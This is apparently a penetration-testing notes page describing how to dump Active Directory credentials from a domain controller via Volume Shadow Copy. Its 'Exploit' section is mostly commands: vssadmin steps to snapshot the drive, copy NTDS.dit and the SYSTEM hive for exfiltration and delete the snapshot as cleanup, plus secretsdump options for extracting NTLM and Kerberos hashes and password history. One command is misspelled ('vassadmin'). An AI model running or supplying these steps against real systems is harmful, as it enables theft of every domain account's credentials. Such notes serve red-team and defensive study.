# Volume Shadow Copy

### Volume Shadow Copy

Volume Shadow Copy (VSS) is a feature in Windows that allows for the creation of snapshots, or shadow copies, of files and volumes on a Windows system. These snapshots can be used for backup and recovery purposes and provide a point-in-time copy of files, including the NTDS.dit database.

Use the built-in command-line tool *vssadmin* to obtain backups of NTDS.dit and the SYSTEM file containing the Boot Key required to decrypt NTDS.dit.

{% hint style="info" %}
*vssadmin* should be run from the command line on a Domain Controller
{% endhint %}

## Exploit

{% tabs %}
{% tab title="secretsdump.py" %}
{% code title="Linux" %}

```fish
secretsdump.py [domain/username]<:password> <options> -use-vss

OPTIONS
-just-dc                    Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm               Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username]    Extract Only NTDS.dit Data For Specified User
-user-status                Display If The User Is Disabled
-history                    Dump Password History
-outputfile                 Base Output Filename

-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File
```

{% endcode %}
{% endtab %}

{% tab title="vssadmin" %}
{% code title="Windows" %}

```powershell
## Create A Shadow Copy Of The C Drive
vssadmin create shadow for /for=C:

## Copy The NTDS.dit And SYSTEM Hive From The Shadow Copy To Be Exfiltrated
copy [ShadowCopyName]\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy [ShadowCopyName]\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save

## Delete The Shadow Copy We Created To Clean Up A Bit
vassadmin delete shadows /shadow=[ShadowCopyID]
```

{% endcode %}

{% code title="Linux" %}

```fish
## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCAL
```

{% endcode %}
{% endtab %}
{% endtabs %}